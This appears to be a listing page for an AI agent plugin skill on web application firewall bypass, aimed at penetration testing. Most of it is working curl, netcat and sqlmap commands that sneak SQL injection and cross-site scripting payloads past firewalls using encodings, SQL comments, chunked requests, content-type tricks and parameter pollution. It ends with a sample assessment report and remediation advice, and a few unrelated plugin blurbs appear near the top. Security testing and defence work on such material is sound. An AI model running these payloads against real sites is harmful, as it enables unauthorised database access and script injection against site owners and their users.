From cybersecurity-skills
Bypasses WAF protections with encoding, obfuscation, HTTP tricks, and parameter pollution to test SQLi/XSS payloads in pentesting and red teaming.
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsThis skill uses the workspace's default tool permissions.
- When confirmed vulnerabilities are blocked by WAF signature-based detection
Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.
Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.
Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.
# Detect WAF using wafw00f
wafw00f http://target.com
# Manual WAF detection via response headers
curl -sI http://target.com | grep -iE "x-cdn|server|x-powered-by|x-sucuri|cf-ray|x-akamai"
# Trigger WAF with known bad payload and analyze response
curl "http://target.com/page?id=1' OR 1=1--" -v
# Look for: 403 Forbidden, custom block page, CAPTCHA challenge
# Common WAF indicators:
# Cloudflare: cf-ray header, __cfduid cookie
# AWS WAF: x-amzn-requestid
# ModSecurity: Mod_Security or OWASP CRS error messages
# Akamai: AkamaiGHost header
# Imperva: incap_ses cookie, visid_incap cookie
# URL encoding bypass
curl "http://target.com/page?id=1%27%20OR%201%3D1--"
# Double URL encoding
curl "http://target.com/page?id=1%2527%2520OR%25201%253D1--"
# Unicode encoding
curl "http://target.com/page?id=1%u0027%u0020OR%u00201%u003D1--"
# HTML entity encoding in body
curl -X POST http://target.com/search \
-d "q=<script>alert(1)</script>"
# Mixed case SQL keywords
curl "http://target.com/page?id=1' UnIoN SeLeCt password FrOm users--"
# Inline comments between SQL keywords
curl "http://target.com/page?id=1'/*!UNION*//*!SELECT*/password/*!FROM*/users--"
# MySQL version-specific comments
curl "http://target.com/page?id=1' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--"
# Null bytes
curl "http://target.com/page?id=1'%00 OR 1=1--"
# Tab and newline substitution for spaces
curl "http://target.com/page?id=1'%09UNION%0ASELECT%0D1,2,3--"
# Change HTTP method (WAFs may only inspect GET/POST)
curl -X PUT "http://target.com/page?id=1' OR 1=1--"
curl -X PATCH "http://target.com/page" -d "id=1' OR 1=1--"
# Use HTTP/0.9 (no headers)
printf "GET /page?id=1' OR 1=1-- \r\n" | nc target.com 80
# Content-Type manipulation
curl -X POST http://target.com/page \
-H "Content-Type: application/x-www-form-urlencoded; charset=ibm037" \
-d "id=1' OR 1=1--"
# Multipart form data (may bypass body inspection)
curl -X POST http://target.com/page \
-F "id=1' OR 1=1--"
# Chunked Transfer-Encoding
printf "POST /page HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\n\r\n4\r\nid=1\r\n11\r\n' OR 1=1--\r\n0\r\n\r\n" | nc target.com 80
# Parameter in unusual locations
curl http://target.com/page -H "X-Forwarded-For: 1' OR 1=1--"
curl http://target.com/page -H "Referer: http://target.com/page?id=1' OR 1=1--"
# HTTP Parameter Pollution
curl "http://target.com/page?id=1' UNION&id=SELECT password FROM users--"
# Split payload across parameters
curl "http://target.com/page?id=1'/*&q=*/UNION SELECT 1,2,3--"
# JSON-based SQLi (many WAFs miss JSON payloads)
curl -X POST http://target.com/api/query \
-H "Content-Type: application/json" \
-d '{"id": "1 AND 1=1 UNION SELECT password FROM users"}'
# JSON SQL injection with operators
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"query": {"$gt":"", "$where":"1==1"}}'
# XML-wrapped payloads
curl -X POST http://target.com/api/data \
-H "Content-Type: application/xml" \
-d "<data><id>1' UNION SELECT password FROM users--</id></data>"
# SQLMap with built-in tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase,space2comment
# Common tamper scripts for WAF bypass:
sqlmap -u "http://target.com/page?id=1" --tamper=charunicodeencode
sqlmap -u "http://target.com/page?id=1" --tamper=space2mssqlhash
sqlmap -u "http://target.com/page?id=1" --tamper=percentage
sqlmap -u "http://target.com/page?id=1" --tamper=chardoubleencode,between
# Multiple tamper scripts combined
sqlmap -u "http://target.com/page?id=1" \
--tamper=randomcase,space2comment,between,charunicodeencode \
--random-agent --level 5 --risk 3
# Custom WAF bypass profile
sqlmap -u "http://target.com/page?id=1" \
--tamper=space2comment,randomcase \
--delay=2 --random-agent \
--technique=B --batch
# Case variation
curl "http://target.com/page?q=<ScRiPt>alert(1)</ScRiPt>"
# Event handler alternatives
curl "http://target.com/page?q=<img src=x oNerRor=alert(1)>"
curl "http://target.com/page?q=<svg/onload=alert(1)>"
curl "http://target.com/page?q=<body onpageshow=alert(1)>"
curl "http://target.com/page?q=<marquee onstart=alert(1)>"
# JavaScript URI scheme
curl "http://target.com/page?q=<a href=javascript:alert(1)>click</a>"
# Template literal syntax
curl "http://target.com/page?q=<script>alert\x601\x60</script>"
# Concatenation-based bypass
curl "http://target.com/page?q=<script>al\u0065rt(1)</script>"
# HTML encoding within attributes
curl "http://target.com/page?q=<img src=x onerror=alert(1)>"
# Double encoding
curl "http://target.com/page?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E"
| Concept | Description |
|---|---|
| Signature Evasion | Obfuscating payloads to avoid matching WAF regex patterns |
| Encoding Bypass | Using URL, Unicode, or HTML encoding to disguise malicious characters |
| Protocol-Level Bypass | Exploiting HTTP protocol features (chunked encoding, method override) |
| Tamper Scripts | SQLMap modules that transform payloads to evade specific WAF rules |
| Content-Type Confusion | Sending payloads in unexpected content types the WAF does not inspect |
| Parameter Pollution | Splitting payloads across duplicate parameters to evade per-parameter inspection |
| Behavioral vs Signature | WAF detection modes: pattern matching (bypassable) vs. anomaly detection (harder) |
| Tool | Purpose |
|---|---|
| wafw00f | WAF fingerprinting and identification |
| SQLMap | Automated SQL injection with WAF bypass tamper scripts |
| waf-bypass.com | Community-maintained WAF bypass payload database |
| Awesome-WAF | Curated GitHub repository of WAF bypass techniques |
| Burp Suite | HTTP proxy for manual payload crafting and WAF response analysis |
| XSStrike | XSS scanner with WAF detection and bypass capabilities |
## WAF Bypass Assessment Report
- **Target**: http://target.com
- **WAF Identified**: Cloudflare (via cf-ray header)
- **Bypass Achieved**: Yes
### WAF Detection Results
| Payload Type | Blocked | Bypass Found |
|-------------|---------|-------------|
| Basic SQLi | Yes | Yes (JSON encoding) |
| UNION SELECT | Yes | Yes (inline comments) |
| XSS <script> | Yes | Yes (SVG onload) |
| Path Traversal | No | N/A (not blocked) |
### Successful Bypass Payloads
| # | Original (Blocked) | Bypass Payload | Technique |
|---|-------------------|---------------|-----------|
| 1 | 1' OR 1=1-- | {"id":"1' OR 1=1--"} | JSON content-type |
| 2 | UNION SELECT | /*!50000UNION*/ /*!50000SELECT*/ | MySQL version comments |
| 3 | <script>alert(1)</script> | <svg/onload=alert(1)> | Alternative tag+event |
### Remediation
- Enable JSON body inspection in WAF rules
- Implement behavioral analysis alongside signature detection
- Add rules for uncommon HTML tags and event handlers
- Enable deep content inspection for all HTTP methods
- Implement request normalization before rule evaluation